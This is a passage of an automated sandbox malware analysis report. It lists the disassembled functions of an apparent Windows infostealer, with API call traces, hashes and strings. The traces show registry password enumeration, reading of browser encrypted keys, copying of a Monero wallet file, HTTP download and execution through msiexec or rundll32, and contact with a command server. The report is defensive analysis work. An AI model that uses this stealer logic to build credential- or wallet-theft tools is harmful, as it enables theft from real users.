                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 0ccd7d9b8c8b77fcdc1ded7926aa237540ec59925e134963ab2c733ee028801d
                              • Instruction ID: aefb370510434206e461963b7635571ed3f053a3afd1fc263a5dde29c5e9d3e7
                              • Opcode Fuzzy Hash: 0ccd7d9b8c8b77fcdc1ded7926aa237540ec59925e134963ab2c733ee028801d
                              • Instruction Fuzzy Hash: F412FD71A10209DAEB16FBA0DD91FEEB778AF24300F404169E586671D4EF742B4ACF61
                              Function 010052C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF6280: InternetOpenA.WININET(01010DFE,00000001,00000000,00000000,00000000), ref: 00FF62E1
                                • Part of subcall function 00FF6280: StrCmpCA.SHLWAPI(?,0198FB08), ref: 00FF6303
                                • Part of subcall function 00FF6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FF6335
                                • Part of subcall function 00FF6280: HttpOpenRequestA.WININET(00000000,GET,?,0198F400,00000000,00000000,00400100,00000000), ref: 00FF6385
                                • Part of subcall function 00FF6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FF63BF
                                • Part of subcall function 00FF6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FF63D1
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 01005318
                              • lstrlen.KERNEL32(00000000), ref: 0100532F
                                • Part of subcall function 01008E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01008E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 01005364
                              • lstrlen.KERNEL32(00000000), ref: 01005383
                              • lstrlen.KERNEL32(00000000), ref: 010053AE
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 8d8aae5b0428202a6010bae2b8075232827a8eb91b6d587d047fdae9c1afd5c5
                              • Instruction ID: ab15dc4d4060f8e36db6cea7259b9e6e2090f553181a2680b48e8a4994fbc0cb
                              • Opcode Fuzzy Hash: 8d8aae5b0428202a6010bae2b8075232827a8eb91b6d587d047fdae9c1afd5c5
                              • Instruction Fuzzy Hash: FF511B30A10249DBEB1AEF64DD95EED7778AF24301F508028E58B9B5D0DF346B0ACB61
                              Function 010012D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 094ad48b42d6d98b9911d5ac33bb7cc9a52f0756d870c5b2cdbeb8c23d6b5a59
                              • Instruction ID: 4952a0f3257ef6a530c7922d5575174cc093f76321f89ae35ed1b76a4e3bad54
                              • Opcode Fuzzy Hash: 094ad48b42d6d98b9911d5ac33bb7cc9a52f0756d870c5b2cdbeb8c23d6b5a59
                              • Instruction Fuzzy Hash: 70C185B5E00219DBDB15EF60DC89FEE7378BB64304F004599E54AA7281EB70EA85CF90
                              Function 01004280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 01008DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01008E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 010042EC
                              • lstrcat.KERNEL32(?,0198F280), ref: 0100430B
                              • lstrcat.KERNEL32(?,?), ref: 0100431F
                              • lstrcat.KERNEL32(?,0198D7F8), ref: 01004333
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 01008D90: GetFileAttributesA.KERNEL32(00000000,?,00FF1B54,?,?,0101564C,?,?,01010E1F), ref: 01008D9F
                                • Part of subcall function 00FF9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FF9D39
                                • Part of subcall function 00FF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FF99EC
                                • Part of subcall function 00FF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FF9A11
                                • Part of subcall function 00FF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FF9A31
                                • Part of subcall function 00FF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FF148F,00000000), ref: 00FF9A5A
                                • Part of subcall function 00FF99C0: LocalFree.KERNEL32(00FF148F), ref: 00FF9A90
                                • Part of subcall function 00FF99C0: CloseHandle.KERNEL32(000000FF), ref: 00FF9A9A
                                • Part of subcall function 010093C0: GlobalAlloc.KERNEL32(00000000,010043DD,010043DD), ref: 010093D3
                              • StrStrA.SHLWAPI(?,0198F190), ref: 010043F3
                              • GlobalFree.KERNEL32(?), ref: 01004512
                                • Part of subcall function 00FF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FF4EEE,00000000,00000000), ref: 00FF9AEF
                                • Part of subcall function 00FF9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FF4EEE,00000000,?), ref: 00FF9B01
                                • Part of subcall function 00FF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FF4EEE,00000000,00000000), ref: 00FF9B2A
                                • Part of subcall function 00FF9AC0: LocalFree.KERNEL32(?,?,?,?,00FF4EEE,00000000,?), ref: 00FF9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 010044A3
                              • StrCmpCA.SHLWAPI(?,010108D1), ref: 010044C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 010044D2
                              • lstrcat.KERNEL32(00000000,?), ref: 010044E5
                              • lstrcat.KERNEL32(00000000,01010FB8), ref: 010044F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 6b2b15ef8dccc78480b78e2ad339843734f762b840a01d35e3d7ac519977189a
                              • Instruction ID: a35ab3ac6a831c0ecdf131ee52688d4395546116fd0ec4531d64a1697f7b8be7
                              • Opcode Fuzzy Hash: 6b2b15ef8dccc78480b78e2ad339843734f762b840a01d35e3d7ac519977189a
                              • Instruction Fuzzy Hash: 1B7174B6900208ABDB15FBA4EC89FEE7378BB48300F048598E64597185EB75D749CF91
                              Function 00FF1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00FF12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF12B4
                                • Part of subcall function 00FF12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00FF12BB
                                • Part of subcall function 00FF12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FF12D7
                                • Part of subcall function 00FF12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FF12F5
                                • Part of subcall function 00FF12A0: RegCloseKey.ADVAPI32(?), ref: 00FF12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 00FF134F
                              • lstrlen.KERNEL32(?), ref: 00FF135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00FF1377
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 01008B60: GetSystemTime.KERNEL32(01010E1A,0198E8C8,010105AE,?,?,00FF13F9,?,0000001A,01010E1A,00000000,?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 01008B86
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00FF1465
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FF99EC
                                • Part of subcall function 00FF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FF9A11
                                • Part of subcall function 00FF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FF9A31
                                • Part of subcall function 00FF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FF148F,00000000), ref: 00FF9A5A
                                • Part of subcall function 00FF99C0: LocalFree.KERNEL32(00FF148F), ref: 00FF9A90
                                • Part of subcall function 00FF99C0: CloseHandle.KERNEL32(000000FF), ref: 00FF9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 00FF14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 3065412caca77ceb333250018ffe5c1a49ccf184065412bb586bb3c98439b19b
                              • Instruction ID: 4c19b21889bec208947a71dd66075f29b4c7e67c5e2b8cf12ef41107683ade93
                              • Opcode Fuzzy Hash: 3065412caca77ceb333250018ffe5c1a49ccf184065412bb586bb3c98439b19b
                              • Instruction Fuzzy Hash: FB5165B1E5021997DB16FB60DD95FED737CAF64200F4041A8A68AA30D0EF345B89CFA5
                              Function 00FF75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00FF72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FF733A
                                • Part of subcall function 00FF72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FF73B1
                                • Part of subcall function 00FF72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FF740D
                                • Part of subcall function 00FF72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00FF7452
                                • Part of subcall function 00FF72D0: HeapFree.KERNEL32(00000000), ref: 00FF7459
                              • lstrcat.KERNEL32(00000000,010117FC), ref: 00FF7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00FF7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 00FF765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00FF768F
                              • lstrcat.KERNEL32(00000000,01011804), ref: 00FF76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00FF76D3
                              • lstrcat.KERNEL32(00000000,01011808), ref: 00FF76ED
                              • task.LIBCPMTD ref: 00FF76FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 5834e8f8c70c3e0fda8b24c575ae218e6b52011f23b6a804b0ea5ea0dc4d39df
                              • Instruction ID: b8fabeda6af6d333334e0970e59b228fb7aec0fe417d932e67f8331795131cf3
                              • Opcode Fuzzy Hash: 5834e8f8c70c3e0fda8b24c575ae218e6b52011f23b6a804b0ea5ea0dc4d39df
                              • Instruction Fuzzy Hash: E531EC72900209DFCF18EBB4EC99DFE7779AF54301B104128E242E72A4DA39A946EB50
                              Function 01008100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0198F6E8,00000000,?,01010E2C,00000000,?,00000000), ref: 01008130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01008137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 01008158
                              • __aulldiv.LIBCMT ref: 01008172
                              • __aulldiv.LIBCMT ref: 01008180
                              • wsprintfA.USER32 ref: 010081AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: 8f5bbd7b9fb6d30d794768d2f82d77b82b6c28537cf5144f5a90b4b1e52c07a2
                              • Instruction ID: edf53c772a5b2550dd36049843d98dbc57557bf3e758c6d538d4cde05d235e45
                              • Opcode Fuzzy Hash: 8f5bbd7b9fb6d30d794768d2f82d77b82b6c28537cf5144f5a90b4b1e52c07a2
                              • Instruction Fuzzy Hash: 1F214AB1E44208ABEB10DFD4DC49FAEBBB8FB44B10F104219F645BB2C4C77869008BA5
                              Function 00FF60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FF4839
                                • Part of subcall function 00FF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FF4849
                              • InternetOpenA.WININET(01010DF7,00000001,00000000,00000000,00000000), ref: 00FF610F
                              • StrCmpCA.SHLWAPI(?,0198FB08), ref: 00FF6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00FF618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00FF61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00FF61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FF620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00FF6249
                              • InternetCloseHandle.WININET(?), ref: 00FF6253
                              • InternetCloseHandle.WININET(00000000), ref: 00FF6260
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: fb369467f215555f6855833390ee37f542d2f61c572a1d9349db627fe55d594c
                              • Instruction ID: 567d7990e69be3b0f8780f624c4b45046cce138f2fd593d5c15b0ecd1d2d7a4e
                              • Opcode Fuzzy Hash: fb369467f215555f6855833390ee37f542d2f61c572a1d9349db627fe55d594c
                              • Instruction Fuzzy Hash: 84514CB1A00218ABEF24DB50DC49BEE77B8EF44705F1080A8A646E71C4DB746A89DF94
                              Function 00FF72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FF733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FF73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FF740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00FF7452
                              • HeapFree.KERNEL32(00000000), ref: 00FF7459
                              • task.LIBCPMTD ref: 00FF7555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
